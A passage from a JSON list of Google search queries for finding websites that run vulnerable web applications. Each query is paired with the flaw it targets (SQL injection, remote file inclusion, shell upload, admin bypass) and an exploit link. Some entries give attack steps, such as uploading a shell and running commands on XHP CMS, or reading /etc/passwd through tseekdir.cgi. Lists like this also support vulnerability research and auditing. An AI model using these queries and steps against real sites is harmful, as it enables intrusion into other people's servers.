\"2005 by Clever Copy\" -inurl:demo", "description": "Clever Copy"}, {"dork": "\"powered by runcms\" -runcms.com -runcms.org", "description": "\"powered by runcms\" -runcms.com -runcms.org all versions"}, {"dork": "(\"This Dragonfly\u00c3\u0192\u00c2\u00a2\u00c3\u00a2\u00e2\u201a\u00ac\u00c5\u00be\u00c3\u201a\u00c2\u00a2 installation was\" | \"Thanks for downloading Dragonfly\") -inurl:demo -inurl:cpgnuke.com", "description": "exploit and short explaination: http://retrogod.altervista.org/dragonfly9.0.6.1_incl_xpl.html"}, {"dork": "inurl:docmgr | intitle:\"DocMGR\" \"enter your Username and\"|\"und Passwort bitte\"|\"saisir votre nom\"|\"su nombre de usuario\" -ext:pdf -inurl:\"download.php", "description": "exploit and short explaination: http://retrogod.altervista.org/docmgr_0542_incl_xpl.html"}, {"dork": "(intitle:\"Flyspray setup\"|\"powered by flyspray 0.9.7\") -flyspray.rocks.cc", "description": "exploiting a bug in EGS Enterprise Groupware System 1.0 rc4, I found this dork: (intitle:\"Flyspray setup\"|\"powered by flyspray 0.9.7\") -flyspray.rocks.cc It is related to the installation script of FileSpray 0.9.7, now I'm going to test 0.9.8-9 by now switch to sql/ directory and search the install-0.9.7.php script explaination link: http://retrogod.altervista.org/egs_10rc4_php5_incl_xpl.htmlexploit adjusted for flyspray: http://retrogod.altervista.org/flyspray_097_php5_incl_xpl.html"}, {"dork": "intext:\"LinPHA Version\" intext:\"Have fun\"", "description": "this is for Linpha"}, {"dork": "\"powered by 4images\"", "description": "this is for 4images"}, {"dork": "intext:\"Powered by Plogger!\" -plogger.org -ihackstuff -exploit", "description": "explaination & exploit: http://retrogod.altervista.org/plogger_b21_sql_xpl.html"}, {"dork": "intext:\"powered by gcards\" -ihackstuff -exploit", "description": "this is for gcards"}, {"dork": "\"Powered by XHP CMS\" -ihackstuff -exploit -xhp.targetit.ro", "description": "tested version: 0.5 without to have admin rights, you can go to: http://[target]/path_to_xhp_cms]/inc/htmlarea/plugins/FileManager/manager.php or http://[target]/path_to_xhp_cms]/inc/htmlarea/plugins/FileManager/standalonemanager.php to upload a shell with the usual code inside... after: http://[target]/[path]/filemanager/shell.php?cmd=ls%20-la tool: http://retrogod.altervista.org/XHP_CMS_05_xpl.html"}, {"dork": "\"powered by php icalendar\" -ihackstuff -exploit", "description": "this is for php iCalendar"}, {"dork": "\"powered by guestbook script\" -ihackstuff -exploit", "description": "poc exploit & explaination: http://retrogod.altervista.org/gbs_17_xpl_pl.html"}, {"dork": "\"powered by claroline\" -demo", "description": "this is for Claroline e-learning platform"}, {"dork": "\"PhpCollab . Log In\" | \"NetOffice . Log In\" | (intitle:\"index.of.\" intitle:phpcollab|netoffice inurl:phpcollab|netoffice -gentoo)", "description": "this is for PhpCollab 2.x / NetOffice 2.x sql injectionhttp://retrogod.altervista.org/phpcollab_2x-netoffice_2x_sql_xpl.html"}, {"dork": "intext:\"2000-2001 The phpHeaven Team\" -sourceforge", "description": "this is the dork for PHPMyChat"}, {"dork": "intext:\"2000-2001 The phpHeaven Team\" -sourceforge", "description": "intext:\"2000-2001 The phpHeaven Team\" -sourceforge this is for PHPMyChat remote commands execution,advisory/poc exploits:http://retrogod.altervista.org/phpmychat_0145_xpl.htmlhttp://retrogod.altervista.org/phpmychat_015dev_xpl.html"}, {"dork": "\"2004-2005 ReloadCMS Team.\"", "description": "this is for ReloadCMS"}, {"dork": "\"powered by phplist\" | inurl:\"lists/?p=subscribe\" | inurl:\"lists/index.php?p=subscribe\" -ubbi -bugs +phplist -tincan.co.uk", "description": "this is for PHPList 2.10.2 arbitrary local inclusion, discovered by me:advisory/poc exploit: http://retrogod.altervista.org/phplist_2102_incl_xpl.html"}, {"dork": "\"You have not provided a survey identification num", "description": "sql injection:http://www.securityfocus.com/bid/16077/discussremote command execution:http://retrogod.altervista.org/phpsurveyor_0995_xpl.html"}, {"dork": "\"This script was created by Php-ZeroNet\" \"Script . Php-ZeroNet\"", "description": "Php-ZeroNet is a script comprised of php allowing webmasters to start a online community. Php-ZeroNet features Content Management, News posting, User CP, interactive sytem, etc. Php-ZeroNet uses a wide range of different cases in its script, it can adaptmy exploit:http://fr0zen.no-ip.org/phpnetzero-1.2.1_xpl.phps"}, {"dork": "intitle:\"HelpDesk\" \"If you need additional help, please email helpdesk at\"", "description": "it's another helpdesk application.my exploit:http://fr0zen.no-ip.org/phphelpdesk-0.6.16_rcxcn_xpl.phps"}, {"dork": "inurl:database.php | inurl:info_db.php ext:php \"Database V2.*\" \"Burning Board *\"", "description": "this is for Woltlab Burning Board 2.x (Datenbank MOD fileid)exploit:http://seclists.org/lists/bugtraq/2006/Mar/0058.html"}, {"dork": "intitle:\"X7 Chat Help Center\" | \"Powered By X7 Chat\" -milw0rm -exploit", "description": "this is for X7 Chat"}, {"dork": "allinurl:tseekdir.cgi", "description": "tseekdir.cgi?location=FILENAME%00eg:tseekdir.cgi?location=/etc/passwd%00basically any file on the server can be viewed by inserting a null (%00) into the URL.credit to duritohttp://seclists.org/bugtraq/2006/May/0184.html"}, {"dork": "\"powered by pppblog v 0.3.(.)\"", "description": "this is for the pppblog 0.3.x system disclosure vulnerability, advisory/poc exploit: http://retrogod.altervista.org/pppblog_038_xpl.html"}, {"dork": "Copyright . Nucleus CMS v3.22 . Valid XHTML 1.0 Strict . Valid CSS . Back to top -demo -\"deadly eyes\"", "description": "this is for Nucleus 3.22 CMS arbitrary remote inclusion advisory/poc exploit: http://retrogod.altervista.org/nucleus_322_incl_xpl.html"}, {"dork": "\"Powered by PHP-Fusion v6.00.110\" | \"Powered by PHP-Fusion v6.00.2..\" | \"Powered by PHP-Fusion v6.00.3..\" -v6.00.400 -johnny.ihackstuff", "description": "this the dork for theese PHP-Fusion exploits:http://retrogod.altervista.org/phpfusion_600306_xpl.htmlhttp://retrogod.altervista.org/phpfusion_600306_sql.html"}, {"dork": "intitle:\"XOOPS Site\" intitle:\"Just Use it!\" | \"powered by xoops (2.0)|(2.0.....)\"", "description": "this is the dork for the XOOPS 2.x 'xoopsOption[nocommon]' overwrite vulnerability, advisory & poc exploit:http://retrogod.altervista.org/xoops_20132_incl.html"}, {"dork": "\"Powered by sendcard - an advanced PHP e-card program\" -site:sendcard.org", "description": "this is for Sendcard remote commands execution,advisory/ poc exploit: http://retrogod.altervista.org/sendcard_340_xpl.html"}, {"dork": "\"powered by xmb\"", "description": "this is for XMB"}, {"dork": "\"Powered by Vsns Lemon\" intitle:\"Vsns Lemon\"", "description": "hxxp://evuln.com/vulns/106/summary.html"}, {"dork": "inurl:\"sbw2Behoerden.php\"", "description": "German.Authorities.CMS SQL Injection Vulnerability. Bug: /data/sbw2Behoerden.php?sbwtyp=\nAuthor: Bloodman"}, {"dork": "This page was produced using SAM Broadcaster. \u00c2\u00a9 Copyright Spacial Audio Solutions, LLC 1999 - 2004.", "description": "samPHPweb (db.php commonpath) Remote File Inclusion Vulnerability - CVE: 2008-0143: https://www.exploit-db.com/exploits/4834"}, {"dork": "allinurl: id \"com_jooget\"", "description": "Joomla Component jooget"}, {"dork": "inurl:comment.asp intext:Your e-mail address will be used to send you voting and comment activity. Inclusion of your address is optional but Battle Blog cannot notify you of these activities unless you supply an accurate e-mail.", "description": "Battle Blog 1.25 Auth Bypass SQL Injection / HTML Injection Vulns - CVE: 2009-3718: https://www.exploit-db.com/exploits/9183"}, {"dork": "inurl:com_img", "description": "Joomla Component (com_img) LFI Vulnerability: https://www.exploit-db.com/exploits/15470"}, {"dork": "inurl:\"toplist.php\" \"powered by phpbb\"", "description": "TopList"}, {"dork": "\"Designed and Developed by Debliteck Ltd\"", "description": "DB[CMS] Sql Injection Vulnerability: https://www.exploit-db.com/exploits/12654"}, {"dork": "intext:\"Powered By : Yamamah Version 1.00\"", "description": "Yamamah 1.0 SQL Injection Vulnerability: https://www.exploit-db.com/exploits/13849"}, {"dork": "inurl:\"whoiscart/admin/hostinginterfaces/\"", "description": "WHOISCART Scripting Vulnerability: https://www.exploit-db.com/exploits/10812"}, {"dork": "\"Powered by nzFotolog v0.4.1 \u00c2\u00a9 2005-2006 Ricardo Amaral\"", "description": "nzFotolog 0.4.1 (action_file) Local File Inclusion Vulnerability - CVE: 2008-3405: https://www.exploit-db.com/exploits/6164"}, {"dork": "\"SQuery 4.5\" |\"SQuery 4.0\" |\"SQuery 3.9\" | inurl:\"modules.php?name=SQuery\"", "description": "SQuery 4.5 (gore.php) Remote File Inclusion Vulnerability: https://www.exploit-db.com/exploits/2003"}, {"dork": "\"Upload unique IP List:\" AND \"The Ultimate Fake Hit Generator - BOOST YOUR ALEXA RANK\"", "description": "Fake Hit Generator 2.2 Shell Upload Vulnerability: https://www.exploit-db.com/exploits/10230"}, {"dork": "inurl:\"ir/addlink.php?id=\" OR inurl:\"addlink.php?id=\"", "description": "list Web (addlink.php id) Remote SQL Injection Vulnerability: https://www.exploit-db.com/exploits/10838"}, {"dork": "intext:\"powered and designed by Dow Group\"", "description": "Dow Group (new.php) SQL Injection: https://www.exploit-db.com/exploits/9491"}, {"dork": "intext:\"powered by Milonic\" inurl:viewnews.php?id=", "description": "Milonic News (viewnews) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/11031"}, {"dork": "\"mirco blogging\"", "description": "x10 mirco blogging V121 SQL Injection Vulnerability: https://www.exploit-db.com/exploits/12042"}, {"dork": "\"Sitedesign by: Dieleman www.dieleman.nl - Copyright \u00a9 2010\"", "description": "Rave Creations/UHM (artists.asp) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/12701"}, {"dork": "\"intext:Warning: passthru()\" \"inurl:view=help\"", "description": "PTC Site's RCE/XSS Vulnerability: https://www.exploit-db.com/exploits/12808"}, {"dork": "PHPG\u00c3\u00a9n\u00c3\u00a9alogie fonctionne sur un serveur PHP", "description": "PHPGenealogy 2.0 (DataDirectory) RFI Vulnerability - CVE: 2009-3541: https://www.exploit-db.com/exploits/9155"}, {"dork": "inurl:\"char.php?id=\" OR intitle:Minimanager for trinity server", "description": "https://www.exploit-db.com/exploits/12554/"}, {"dork": "inurl:\"product_desc.php?id=\" Powered by Zeeways.com", "description": "ZeeWays Script SQL Injection Vulnerability: https://www.exploit-db.com/exploits/11087"}, {"dork": "\"Transloader by Somik.org\" OR \"Transloader by\" OR \"Transloder\"", "description": "Transload Script Upload Vulnerability: https://www.exploit-db.com/exploits/11155"}, {"dork": "Powered by ArticlesOne.com oR Website Powered by ArticlesOne.com", "description": "ArticlesOne 07232006 (page) Remote Include Vulnerability: https://www.exploit-db.com/exploits/2063"}, {"dork": "\"powered by CubeCart\" inurl:\"index.php?_a=\"", "description": "CubeCart (index.php) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/11495"}, {"dork": "intext: \"Site developed & mantained by Woodall Creative Group\"", "description": "Woodall Creative SQL Injection Vulnerability: https://www.exploit-db.com/exploits/12576"}, {"dork": "\"Web Group Communication Center beta 0.5.6\" OR \"Web Group Communication Center beta 0.5.5\"", "description": "WGCC 0.5.6b (quiz.php) Remote SQL Injection Vulnerability - CVE: 2006-5514: https://www.exploit-db.com/exploits/2604"}, {"dork": "inurl:\"picture.php?cat=\" \"Powered by PhpWebGallery 1.3.4\"", "description": "PhpWebGallery 1.3.4 (cat) Blind SQL Injection Vulnerability: https://www.exploit-db.com/exploits/6436"}, {"dork": "\"Powered by Glossword 1.8.11\" OR \"Powered by Glossword 1.8.6\"", "description": "Glossword 1.8.11 (index.php x) Local File Inclusion Vulnerability: https://www.exploit-db.com/exploits/9010"}, {"dork": "Maian Events v2.0 Copyright \u00c2\u00a9 2005-2008 Maian Script World. All Rights Reserved", "description": "Maian Events 2.0 Insecure Cookie Handling Vulnerability: https://www.exploit-db.com/exploits/6048"}, {"dork": "inurl:categoria.php?ID= comune", "description": "Prometeo v1.0.65 SQL Injection Vulnerability: https://www.exploit-db.com/exploits/14806"}, {"dork": "\"Web site engine's code is copyright \u00c2\u00a9 2001-2007 ATutor\u00c2\u00ae\"", "description": "ATutor 1.6.1-pl1 (import.php) Remote File Inclusion Vulnerability - CVE: 2008-3368: https://www.exploit-db.com/exploits/6153"}, {"dork": "Cr\u00c3\u00a9\u00c3\u00a9 par Narfight, ClanLite V2.2006.05.20 \u00c2\u00a9 2000-2005", "description": "ClanLite 2.x (SQL Injection/XSS) Multiple Remote Vulnerabilities - CVE: 2008-5215: https://www.exploit-db.com/exploits/5595"}, {"dork": "\"Powered by Atomic Photo Album\" inurl:\"photo.php?apa_album_ID=\"", "description": "Atomic Photo Album 1.0.2 Multiple Vulnerabilities: https://www.exploit-db.com/exploits/14801"}, {"dork": "\"100% | 50% | 25%\" \"Back to gallery\" inurl:\"show.php?imageid=\"", "description": "Easy Photo Gallery 2.1 Arbitrary Add Admin / remove user Vulnerability - CVE: 2008-4167: https://www.exploit-db.com/exploits/6437"}, {"dork": "Powered by DUdforum 3.0 inurl:/forums.asp?iFor=", "description": "DUdForum 3.0 (forum.asp iFor) Remote SQL Injection Vulnerability: https://www.exploit-db.com/exploits/5894"}, {"dork": "allinurl: galid \"index.php?p=gallerypic\"", "description": "Koobi Pro 6.25 gallery Remote SQL Injection Vulnerability: https://www.exploit-db.com/exploits/5413"}, {"dork": "\"Powered by yappa-ng 2.3.1\" AND \"Powered by yappa-ng 2.3.1\"", "description": "yappa-ng 2.3.1 (admin_modules) Remote File Include Vulnerability: https://www.exploit-db.com/exploits/2292"}, {"dork": "\"ActualAnalyzer Lite (free) 2.78\"+\"Copyright \u00c2\u00a9 2006 ActualScripts\"", "description": "ActualAnalyzer Lite (free) 2.78 Local File Inclusion Vulnerability - CVE: 2008-2076: https://www.exploit-db.com/exploits/5528"}, {"dork": "inurl:com_forum", "description": "com_forum Mambo Component"}, {"dork": "\"Copyright (c) 2004-2006 by Simple PHP Guestbook\"", "description": "Simple PHP Guestbook Remote Admin Access: https://www.exploit-db.com/exploits/10666"}, {"dork": "inurl:\"browse.php?folder=\" Powered by GeneShop 5", "description": "GeneShop 5.1.1 SQL Injection Vunerability: https://www.exploit-db.com/exploits/12442"}, {"dork": "inurl:/modules/Partenaires/clic.php?id=", "description": "Nuked-Klan Module Partenaires NK 1.5 Blind Sql Injection: https://www.exploit-db.com/exploits/14556"}, {"dork": "\"powered by DBHcms\"", "description": "DBHcms 1.1.4 Stored XSS: https://www.exploit-db.com/exploits/12499"}, {"dork": "intext:\"sitio web dise\u00f1ado por www.toronja.com.pe\"", "description": "Toronja Cms HTML/XSS Injection Vulnerability: https://www.exploit-db.com/exploits/12771"}, {"dork": "Maian Gallery v2.0 Copyright \u00c2\u00a9 2006-2008 Maian Script World. All Rights Reserved.", "description": "Maian Gallery 2.0 Insecure Cookie Handling Vulnerability: https://www.exploit-db.com/exploits/6049"}, {"dork": "allintext:\" If you would like to contact us, our email address is\" traffic", "description": "Traffic Stats (referralUrl.php offset) Remote SQL Injection Vulnerbility - CVE: 2007-3840: https://www.exploit-db.com/exploits/4187"}, {"dork": "powered by apt-webservice ;apt-webshop-system v3.0", "description": "APT-WEBSHOP-SYSTEM modules.php SQL Injection Vulnerability: https://www.exploit-db.com/exploits/14528"}, {"dork": "Maian Music v1.0. Copyright \u00c2\u00a9 2007-2008 Maian Script World. All Rights Reserved.", "description": "Maian Music 1.0 Insecure Cookie Handling Vulnerability: https://www.exploit-db.com/exploits/6051"}, {"dork": "\"Help desk software by United Web Coders rev. 3.0.640\"", "description": "Trouble Ticket Software ttx.cgi Remote File Download: https://www.exploit-db.com/exploits/11823"}, {"dork": "\"Software PBLang 4.66z\" AND \"Software PBLang 4.60\" OR \"Software PBLang\"", "description": "PBLang 4.66z (temppath) Remote File Include Vulnerability - CVE: 2006-5062: https://www.exploit-db.com/exploits/2428"}, {"dork": "intext:\"Web design by goffgrafix.com\"", "description": "goffgrafix Design's SQL Injection Vulnerability: https://www.exploit-db.com/exploits/12712"}, {"dork": "\"Welcome to Exponent CMS\" | \"my new exponent site\" inurl:articlemodule", "description": "Exponent CMS 0.96.3 (articlemodule) Sql Injection Vulnerability: https://www.exploit-db.com/exploits/11349"}, {"dork": "\"Powered by Drumbeat\" inurl:index02.php", "description": "Drumbeat CMS SQL Injection: https://www.exploit-db.com/exploits/10575"}, {"dork": "\"Designed & Developed by N.E.T E-Commerce Group. All Rights Reserved.\"", "description": "IranMC Arad Center (news.php id) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/6712"}, {"dork": "\"Powered by SocketMail Lite version 2.2.8. Copyright \u00c2\u00a9 2002-2006\"", "description": "SocketMail 2.2.8 fnc-readmail3.php Remote File Inclusion Vulnerability - CVE: 2007-5627: https://www.exploit-db.com/exploits/4554"}, {"dork": "Powered by WHMCompleteSolution - OR inurl:WHMCS OR announcements.php", "description": "WHMCS Control 2 (announcements.php) SQL Injection: https://www.exploit-db.com/exploits/12481"}, {"dork": "inurl:inc_catalogmanager.asp", "description": "DMXReady Catalog Manager 1.1 Remote Contents Change Vuln: https://www.exploit-db.com/exploits/7766"}, {"dork": "allinurl: \"pollBooth.php?op=results\"pollID", "description": "Pollbooth 2.0 (pollID) Remote SQL Injection Vulnerability: https://www.exploit-db.com/exploits/5436"}, {"dork": "\"Factux le facturier libre V 1.1.5\"", "description": "Factux LFI Vulnerability: https://www.exploit-db.com/exploits/12521"}, {"dork": "Powered by XAOS systems", "description": "XAOS CMS SQL Injection Vulnerability: https://www.exploit-db.com/exploits/14469"}, {"dork": "inurl:inc_documentlibrarymanager.asp", "description": "DMXReady Document Library Manager 1.1 Contents Change Vuln: https://www.exploit-db.com/exploits/7769"}, {"dork": "inurl:\"phpRaid\" \"phpRaid\" \"roster.php?Sort=Race\"", "description": "phpRaid 3.0.7 (rss.php phpraid_dir) Remote File Inclusion: https://www.exploit-db.com/exploits/3528"}, {"dork": "inurl:\"classifieds.php?cat=\"", "description": "BM Classifieds Ads SQL Injection Vulnerability: https://www.exploit-db.com/exploits/10314"}, {"dork": "inurl:\"index.php?option=com_jequoteform\"", "description": "Joomla Component com_jequoteform - Local File Inclusion - CVE: 2010-2128: https://www.exploit-db.com/exploits/12607"}, {"dork": "\"Software Categories\" \"Featured Resources\" \"Search\"", "description": "HotScripts Clone Script Remote SQL Injection Vulnerability - CVE: 2007-6084: https://www.exploit-db.com/exploits/4633"}, {"dork": "\"Website Powered By Creative SplashWorks - SplashSite\"", "description": "Creative SplashWorks-SplashSite (page.php) Blind Sql Injection Vulnerability: https://www.exploit-db.com/exploits/11300"}, {"dork": "inurl:\"index.php?com_remository\"", "description": "Joomla Component (com_remository) Remote Upload File: https://www.exploit-db.com/exploits/14811"}, {"dork": "\u00c2\u00a9 2007 by Lama Software - Accomm Solutions GmbH & Co. KG", "description": "Lama Software (14.12.2007) Multiple Remote File Inclusion Vulnerabilities - CVE: 2008-0423: https://www.exploit-db.com/exploits/4955"}, {"dork": "inurl:\"index.php?option=com_portfolio\"", "description": "Mambo Component Portfolio 1.0 (categoryId) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/5139"}, {"dork": "Powered by Article DashBoard", "description": "Article Friendly SQL Injection Vulnerability: https://www.exploit-db.com/exploits/11530"}, {"dork": "inurl:post.php?Category=Garage", "description": "GarageSales Remote Upload Vulnerability: https://www.exploit-db.com/exploits/12128"}, {"dork": "\"Send amazing greetings to your friends and relative!\"", "description": "greeting card Remote Upload Vulnerability: https://www.exploit-db.com/exploits/13751"}, {"dork": "inurl:tabid/176/Default.aspx OR inurl:portals/0/", "description": "DotNetNuke Remote File upload Vulnerability: https://www.exploit-db.com/exploits/12700"}, {"dork": "\"Eyeland Studio Inc. All Rights Reserved.\"", "description": "Eyeland Studio Inc. SQL Injection Vulnerability: https://www.exploit-db.com/exploits/13855"}, {"dork": "Powered by Info Fisier", "description": "Info Fisier v1.0 SQL Injection Vulnerability: https://www.exploit-db.com/exploits/10726"}, {"dork": "Powered by ArticleMS from ArticleTrader", "description": "Article Management System 2.1.2 Reinstall Vulnerability: https://www.exploit-db.com/exploits/12858"}, {"dork": "\"powered by Sniggabo CMS\" inurl:article.php?id", "description": "Sniggabo CMS (article.php id) Remote SQL Injection: https://www.exploit-db.com/exploits/8933"}, {"dork": "\"Powered By 0DayDB v2.3\"", "description": "0DayDB 2.3 (delete id) Remote Admin Bypass: https://www.exploit-db.com/exploits/4896"}, {"dork": "intext:\"Powered by Max.Blog\"", "description": "Max.Blog 1.0.6 (show_post.php) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/7885"}, {"dork": "\"Powered by Active PHP Bookmarks v1.3\" inurl:.view_group.php?id=", "description": "Active PHP Bookmarks v1.3 SQL Injection Vulnerability - CVE: 2008-3748: https://www.exploit-db.com/exploits/10597"}, {"dork": "Powered by: XP Book v3.0", "description": "XP Book v3.0 login Admin: https://www.exploit-db.com/exploits/10621"}, {"dork": "\"Powered by ispCP Omega\"", "description": "ispCP Omega 1.0.4 Remote File Include Vulnerability: https://www.exploit-db.com/exploits/11681"}, {"dork": "\"This site is powered by CMS Made Simple version 1.\"", "description": "CMS Made Simple 1.6.2 Local File Disclosure Vulnerability: https://www.exploit-db.com/exploits/9407"}, {"dork": "\"Jax Calendar v1.34 by Jack (tR), www.jtr.de/scripting/php\"", "description": "Jax Calendar 1.34 Remote Admin Access: https://www.exploit-db.com/exploits/10835"}, {"dork": "Powered by Platinum 7.6.b.5", "description": "PHP-Nuke Platinum 7.6.b.5 Remote File Inclusion Vulnerability - CVE: 2007-5676: https://www.exploit-db.com/exploits/4563"}, {"dork": "allinurl: \"index php p shop\"categ", "description": "Koobi Pro 6.25 shop Remote SQL Injection Vulnerability: https://www.exploit-db.com/exploits/5412"}, {"dork": "Rash Version: 1.2.1", "description": "RQMS (Rash) 1.2.2 Multiple SQL Injection Vulnerabilities: https://www.exploit-db.com/exploits/8433"}, {"dork": "Powered by: mevin productions", "description": "Basic PHP Events Lister 2 Add Admin: https://www.exploit-db.com/exploits/10515"}, {"dork": "inurl:\"catalog/product/detail.php?cat=\"", "description": "Webthaiapp detail.php(cat) Blind Sql injection Vulnerability: https://www.exploit-db.com/exploits/12467"}, {"dork": "inurl: user_info.php?user_id= \" Or \" inurl: index.php?catid= \"", "description": "Free Advertisment cms (user_info.php) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/12572"}, {"dork": "Powered by:Traidnt Gallery Version 1.0.", "description": "Traidnt Gallery add Admin: https://www.exploit-db.com/exploits/10629"}, {"dork": "intitle: phpBazar-AdminPanel", "description": "phpBazar admin Information Disclosure Vulnerability: https://www.exploit-db.com/exploits/14439"}, {"dork": "allinurl: \"index.php?showlink\"links", "description": "Koobi Pro 6.25 links Remote SQL Injection Vulnerability: https://www.exploit-db.com/exploits/5411"}, {"dork": "\"Aurora CMS\"", "description": "Aurora CMS Remote SQL Injection: https://www.exploit-db.com/exploits/10609"}, {"dork": "alegrocart", "description": "Alegro 1.2.1 SQL Injection Vulnerability: https://www.exploit-db.com/exploits/12278"}, {"dork": "inurl:/hbcms/php/", "description": "HB CMS 1.7 SQL Injection: https://www.exploit-db.com/exploits/9835"}, {"dork": "inurl:\"list.php?lcat_id=\"", "description": "D-Tendencia Bt 2008 SQL Injection Vulnerability: https://www.exploit-db.com/exploits/10494"}, {"dork": "Designed and Developed by karkia E-commerce", "description": "E-commerce Group (cat.php) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/12696"}, {"dork": "\"hlstats.php?mode=dailyawardinfo&award=\" hlstatsx", "description": "HLstatsX v1.65 SQL Injection Vulnerability: https://www.exploit-db.com/exploits/10850"}, {"dork": "Powered by Plogger!", "description": "Plogger Remote File Disclosure Vulnerability: https://www.exploit-db.com/exploits/14636"}, {"dork": "Help Desk Software by Kayako SupportSuite v3.70.02", "description": "Kayako eSupport v3.70.02 SQL Injection Vulnerability - CVE: 2010-2911: https://www.exploit-db.com/exploits/14392"}, {"dork": "\"powered by dataface\" \"powered by xataface\"", "description": "Xataface Admin Auth Bypass Vulnerability: https://www.exploit-db.com/exploits/11852"}, {"dork": "inurl:\"weblink_cat_list.php?bcat_id=\"", "description": "WHMCompleteSolution CMS sql Injection Vulnerability: https://www.exploit-db.com/exploits/10493"}, {"dork": "allinurl:\"/lildbi/\"", "description": "LILDBI Shell Upload Vulnerability: https://www.exploit-db.com/exploits/14443"}, {"dork": "\"Copyrights \u00c2\u00a9 2005 Belgische Federale Overheidsdiensten\"", "description": "Newsmanager 2.0 (RFI/RFD/SQL/PB) Multiple Remote Vulnerabilities - CVE: 2008-2342: https://www.exploit-db.com/exploits/5624"}, {"dork": "JBC explorer [ by Psykokwak & XaV ]", "description": "Explorer V7.20 Cross Site Scripting Vulnerability: https://www.exploit-db.com/exploits/10566"}, {"dork": "\"powered by Blue Dove Web Design\"", "description": "Blue Dove Sql Injection Vulnerability: https://www.exploit-db.com/exploits/11360"}, {"dork": "\"Powered by Fantastic News v2.1.2\" or \"Powered by Fantastic News v2.1.3\"", "description": "Fantastic News 2.1.3 (script_path) Remote File Include Vulnerability - CVE: 2006-4285: https://www.exploit-db.com/exploits/2221"}, {"dork": "inurl:treplies.asp?message= intitle:ASP Talk", "description": "ASP Talk (SQL/CSS) Multiple Remote Vulnerabilities: https://www.exploit-db.com/exploits/7378"}, {"dork": "\"MidiCart PHP Database Management\"", "description": "MidiCart PHP,ASP Shell Upload Vulnerability: https://www.exploit-db.com/exploits/12636"}, {"dork": "[ Web Wiz Forums\u00ae version 9.64 [Free Express Edition] ]", "description": "Web Wiz Forums v9.64 Database Disclosure Vulnerability: https://www.exploit-db.com/exploits/10638"}, {"dork": "Copyright 2006 \u00c2\u00a9 Flax Article Manager v1.1", "description": "Flax Article Manager 1.1 Remote PHP Script Upload Vulnerability: https://www.exploit-db.com/exploits/7884"}, {"dork": "allinurl:readmore.php?news_id", "description": "PHP-Fusion v4.01 SQL Injection Vulnerability: https://www.exploit-db.com/exploits/12635"}, {"dork": "\"Powered by Elgg, the leading open source social networking platform\"", "description": "elgg 1.5 (/_css/js.php) Local File Inclusion Vulnerability - CVE: 2009-3149: https://www.exploit-db.com/exploits/9355"}, {"dork": "inurl:/index.php?option=com_yellowpages", "description": "Joomla Yellowpages SQL Injection Vulnerability: https://www.exploit-db.com/exploits/14592"}, {"dork": "\"Emanuele Guadagnoli\" \"CcMail\"", "description": "CcMail"}, {"dork": "This FAQ is powered by CascadianFAQ", "description": "CascadianFAQ 4.1 (index.php) Remote SQL Injection Vulnerability - CVE: 2007-0631: https://www.exploit-db.com/exploits/3227"}, {"dork": "\"site powered by intuitive-websites.com\"", "description": "intuitive (form.php) Sql Injection Vulnerability: https://www.exploit-db.com/exploits/11481"}, {"dork": "Copyright \u00a9 2010 ASP SiteWare. All rights reserved.", "description": "MSSQLi Vulnerability in AutoDealer Ver.1 and Ver.2 - CVE: 2007-0053: https://www.exploit-db.com/exploits/12462"}, {"dork": "intext:\"RPG Inferno is not available to guests\" or intext:\"Battle Ground \u00c2\u00b7 Clans \u00c2\u00b7 Store \u00c2\u00b7 Jobs \u00c2\u00b7 Auction \u00c2\u00b7 Spells Shop \u00c2\u00b7 Statistics \u00c2\u00b7 Member List\"", "description": "vBulletin Mod RPG Inferno 2.4 (inferno.php) SQL Injection Vulnerability - CVE: 2007-3687: https://www.exploit-db.com/exploits/4166"}, {"dork": "inurl:com_jstore", "description": "joomla com_jstore SQLi Vulnerability: https://www.exploit-db.com/exploits/13796"}, {"dork": "APBoard 2.1.0 \u00a9 2003-2010 APP - Another PHP Program", "description": "APBoard v2.1.0 ( board.php?id=) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/14559"}, {"dork": "allintext:\"Browse our directory of our members top sites or create your own for free!\"", "description": "PHP123 Top Sites (category.php cat) Remote SQL Injection Vuln - CVE: 2007-4054: https://www.exploit-db.com/exploits/4241"}, {"dork": "\"ParsBlogger ? 2006. All rights reserved\"", "description": "ParsBlogger (links.asp id) Remote SQL Injection Vulnerability: https://www.exploit-db.com/exploits/6745"}, {"dork": "\"Powered by: PhotoPost PHP 4.6\" or \"Powered by: PhotoPost PHP 4.5\"", "description": "PhotoPost 4.6 (PP_PATH) Remote File Include Vulnerability - CVE: 2006-4828: https://www.exploit-db.com/exploits/2369"}, {"dork": "\"Powered by PG Online Training Solution - learning management system\"", "description": "Pilot Group eTraining (news_read.php id) SQL Injection Vulnerability - CVE: 2008-4709: https://www.exploit-db.com/exploits/6613"}, {"dork": "inurl:cart.php?m=features&id=", "description": "digiSHOP SQL Injection Vulnerability: https://www.exploit-db.com/exploits/15405"}, {"dork": "\"Bu Site Ticimax E-Ticaret yaz\u0131l\u0131m\u0131 ile haz\u0131rlanm\u0131\u015ft\u0131r.\"", "description": "Ticimax E-Ticaret ( SQL Injection ): https://www.exploit-db.com/exploits/12841"}, {"dork": "Powered by: Arab Portal inurl:mod.php?mod=html", "description": "Arab Portal 2.1 Remote File Disclosure Vulnerability - CVE: 2008-5787: https://www.exploit-db.com/exploits/7019"}, {"dork": "Powered by NKINFOWEB VSp \u00a9 2009", "description": "NKINFOWEB SQL Injection - CVE: 2010-1599: https://www.exploit-db.com/exploits/12354"}, {"dork": "Powered by: PHPDirector 0.30 or nurl:videos.php?id=", "description": "PHPDirector 0.30 (videos.php) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/14106"}, {"dork": "\"Powered by RedCat\" inurl:index.php?contentId=", "description": "redcat media SQL Injection: https://www.exploit-db.com/exploits/10043"}, {"dork": "powered by x7 chat 1.3.6b", "description": "X7CHAT v1.3.6b Add Admin: https://www.exploit-db.com/exploits/10931"}, {"dork": "intext:Powered by Infront", "description": "Infront SQL Injection Vulnerability: https://www.exploit-db.com/exploits/13848"}, {"dork": "Powered by Info Fisier.", "description": "Info Fisier 1.0 multiple Vulnerabilities: https://www.exploit-db.com/exploits/10728"}, 